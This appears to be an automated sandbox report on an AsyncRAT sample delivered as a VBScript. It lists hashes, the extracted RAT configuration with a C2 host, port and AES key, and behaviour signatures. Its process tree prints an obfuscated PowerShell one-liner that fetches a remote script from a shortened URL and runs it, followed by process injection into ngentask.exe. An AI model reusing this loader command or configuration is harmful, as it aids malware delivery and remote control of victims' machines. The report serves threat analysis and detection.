Analysis
- max time kernel: 87s
- max time network: 146s
- platform: windows10_x64
- resource: win10v20210408
- submitted: 24-07-2021 07:08
- Static task: static1
- Behavioral task: behavioral1
- Sample: KHTC288.vbs
- Resource: win7v20210408
General
- Target: KHTC288.vbs
- Size: 662B
- MD5: 896c2bbb0dda248ac02ed60683858fa5
- SHA1: 42e44987ae2d842f4e6d197bde7694d18d1dc57a
- SHA256: df8d5648e265825d946b6a3cffe442a39d04570bbe8834cfd54e2aa568fb4520
- SHA512: 090bf4471502c608a3226a02efca77c4e31b345e505c6bee21d5e12b25043a45ec71daca3a73ac81523429dab2f400d3358f40bae7e2523272d7bfa762b06c81
Malware Config
Extracted
- family: asyncrat
- version: 0.5.7B
- C2 (host:port): fat7eorami.ddns.net:1177
- mutex: AsyncMutex_6SI8OkPnk

Configuration fields:
- aes_key: G2WOlk5vwHneijb61ynCU3xRR3D20hZw
- anti_detection: false
- autorun: false
- bdos: false
- delay: omarf2r
- host: fat7eorami.ddns.net
- hwid: 3
- install_file: (empty)
- install_folder: %AppData%
- mutex: AsyncMutex_6SI8OkPnk
- pastebin_config: null
- port: 1177
- version: 0.5.7B
Signatures
- suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
- Async RAT payload (2 IoCs)
  resource | yara_rule
  behavioral2/memory/192-357-0x000000000040C73E-mapping.dmp | asyncrat
  behavioral2/memory/192-356-0x0000000000400000-0x0000000000412000-memory.dmp | asyncrat
- Blocklisted process makes network request (4 IoCs)
  Processes: powershell.exe
  flow | pid | process
  11 | 2528 | powershell.exe
  13 | 2528 | powershell.exe
  18 | 2528 | powershell.exe
  19 | 2528 | powershell.exe
- Suspicious use of SetThreadContext (1 IoCs)
  Processes: powershell.exe
  description | pid | process | target process
  PID 1380 set thread context of 192 | 1380 | powershell.exe | ngentask.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (8 IoCs)
  Processes: powershell.exe, powershell.exe
  pid | process
  2528 | powershell.exe
  2528 | powershell.exe
  2528 | powershell.exe
  1380 | powershell.exe
  1380 | powershell.exe
  1380 | powershell.exe
  1380 | powershell.exe
  1380 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes: powershell.exe, powershell.exe, ngentask.exe
  description | pid | process
  Token: SeDebugPrivilege | 2528 | powershell.exe
  Token: SeDebugPrivilege | 1380 | powershell.exe
  Token: SeDebugPrivilege | 192 | ngentask.exe
- Suspicious use of WriteProcessMemory (15 IoCs)
  Processes: WScript.exe, powershell.exe, powershell.exe
  description | pid | process | target process
  PID 632 wrote to memory of 2528 | 632 | WScript.exe | powershell.exe
  PID 632 wrote to memory of 2528 | 632 | WScript.exe | powershell.exe
  PID 2528 wrote to memory of 1380 | 2528 | powershell.exe | powershell.exe
  PID 2528 wrote to memory of 1380 | 2528 | powershell.exe | powershell.exe
  PID 1380 wrote to memory of 3492 | 1380 | powershell.exe | ngentask.exe
  PID 1380 wrote to memory of 3492 | 1380 | powershell.exe | ngentask.exe
  PID 1380 wrote to memory of 3492 | 1380 | powershell.exe | ngentask.exe
  PID 1380 wrote to memory of 192 | 1380 | powershell.exe | ngentask.exe
  PID 1380 wrote to memory of 192 | 1380 | powershell.exe | ngentask.exe
  PID 1380 wrote to memory of 192 | 1380 | powershell.exe | ngentask.exe
  PID 1380 wrote to memory of 192 | 1380 | powershell.exe | ngentask.exe
  PID 1380 wrote to memory of 192 | 1380 | powershell.exe | ngentask.exe
  PID 1380 wrote to memory of 192 | 1380 | powershell.exe | ngentask.exe
  PID 1380 wrote to memory of 192 | 1380 | powershell.exe | ngentask.exe
  PID 1380 wrote to memory of 192 | 1380 | powershell.exe | ngentask.exe
Processes (process tree; indentation shows parent/child depth 1 to 4)
- [depth 1] C:\Windows\System32\WScript.exe
  command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\KHTC288.vbs"
  - Suspicious use of WriteProcessMemory
  - [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec Bypass gdr -*;Set-Variable 5 (&(Get-Item Variable:/E*t).Value.InvokeCommand.(((Get-Item Variable:/E*t).Value.InvokeCommand|Get-Member|?{(DIR Variable:/_).Value.Name-ilike'*ts'}).Name).Invoke('*w-*ct')Net.WebClient);Set-Variable S 'https://bit.ly/3wZ38ji'; (Get-Item Variable:/E*t).Value.InvokeCommand.InvokeScript((GCI Variable:5).Value.((((GCI Variable:5).Value|Get-Member)|?{(DIR Variable:/_).Value.Name-ilike'*wn*g'}).Name).Invoke((GV S -ValueO)))
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - [depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file C:\Users\Public\ToT.ps1
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - [depth 4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
        command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
      - [depth 4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
        command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Public\ToT.ps1
  MD5: ae87ac57338d18d8d6a1e91bb24b9834
  SHA1: feeb1bdad90399c41e97d329a3d007f7fec6ab58
  SHA256: c098aae184b0d20e79b0e7e92bf5722d0febf1949972af6426c8f915dd1d73c1
  SHA512: 095577ca3789215f73c3817e21bdc00b9484111f613c6d97582b365d09faf228156f7d1703496984aee44d55fe5513ab18860002f4e537495b34ea7f4635baa2
- memory/192-375-0x0000000006040000-0x0000000006041000-memory.dmp (Filesize: 4KB)
- memory/192-379-0x0000000007080000-0x0000000007081000-memory.dmp (Filesize: 4KB)
- memory/192-356-0x0000000000400000-0x0000000000412000-memory.dmp (Filesize: 72KB)
- memory/192-372-0x0000000005670000-0x0000000005671000-memory.dmp (Filesize: 4KB)
- memory/192-382-0x00000000075D0000-0x0000000007629000-memory.dmp (Filesize: 356KB)
- memory/192-381-0x0000000007440000-0x00000000074CD000-memory.dmp (Filesize: 564KB)
- memory/192-380-0x0000000006FF0000-0x0000000006FF4000-memory.dmp (Filesize: 16KB)
- memory/192-373-0x0000000005FA0000-0x0000000005FA1000-memory.dmp (Filesize: 4KB)
- memory/192-378-0x0000000006F80000-0x0000000006F81000-memory.dmp (Filesize: 4KB)
- memory/192-377-0x0000000006E00000-0x0000000006E79000-memory.dmp (Filesize: 484KB)
- memory/192-376-0x0000000006E80000-0x0000000006E81000-memory.dmp (Filesize: 4KB)
- memory/192-357-0x000000000040C73E-mapping.dmp
- memory/192-383-0x0000000007630000-0x0000000007631000-memory.dmp (Filesize: 4KB)
- memory/192-374-0x0000000006540000-0x0000000006541000-memory.dmp (Filesize: 4KB)
- memory/1380-336-0x0000020DCFF03000-0x0000020DCFF05000-memory.dmp (Filesize: 8KB)
- memory/1380-353-0x0000020DD0040000-0x0000020DD004E000-memory.dmp (Filesize: 56KB)
- memory/1380-335-0x0000020DCFF00000-0x0000020DCFF02000-memory.dmp (Filesize: 8KB)
- memory/1380-334-0x0000020DD0050000-0x0000020DD0051000-memory.dmp (Filesize: 4KB)
- memory/1380-311-0x0000000000000000-mapping.dmp
- memory/1380-361-0x0000020DCFF06000-0x0000020DCFF08000-memory.dmp (Filesize: 8KB)
- memory/2528-125-0x0000026FD3950000-0x0000026FD3951000-memory.dmp (Filesize: 4KB)
- memory/2528-124-0x0000026FD3713000-0x0000026FD3715000-memory.dmp (Filesize: 8KB)
- memory/2528-114-0x0000000000000000-mapping.dmp
- memory/2528-119-0x0000026FD3660000-0x0000026FD3661000-memory.dmp (Filesize: 4KB)
- memory/2528-123-0x0000026FD3710000-0x0000026FD3712000-memory.dmp (Filesize: 8KB)
- memory/2528-310-0x0000026FD3716000-0x0000026FD3718000-memory.dmp (Filesize: 8KB)